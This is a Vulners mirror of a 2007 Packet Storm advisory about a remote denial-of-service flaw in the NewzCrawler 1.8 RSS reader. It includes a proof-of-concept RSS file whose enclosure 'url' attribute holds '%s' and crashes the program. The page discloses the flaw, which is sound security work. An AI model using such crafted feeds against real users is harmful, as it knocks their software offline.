Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

newzcrawler-dos.txt

๐Ÿ—“๏ธย 16 May 2007ย 00:00:00Reported byย gbrTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 21ย Views

NewzCrawler 1.8 Remote DoS via 'enclosure' sub-element in RSS 2.0 fil

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`NewzCrawler 1.8 Remote Denial of Service  
Credits: gbr  
Tested on Windows XP SP2  
  
NewzCrawler 1.8 becomes usntable and begin crash when parsering the 'url' atribute of  
'enclosure' sub-element contends some invalid string* at time of show a new item of a   
RSS 2.0 file.  
  
* '%s', '%Y', '%%', 'n,', and others.  
  
PoC:  
  
<?xml version="1.0"?>  
<rss version="2.0">  
  
<channel>  
<title>Test</title>  
<link></link>  
<description></description>  
  
<item>  
<title>Remote DoS PoC</title>  
<enclosure url="%s"/>  
</item>  
</channel>  
</rss>  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
newzcrawler 1.8remote denial of service'enclosure' sub-elementrss 2.0 file
21
.json
Report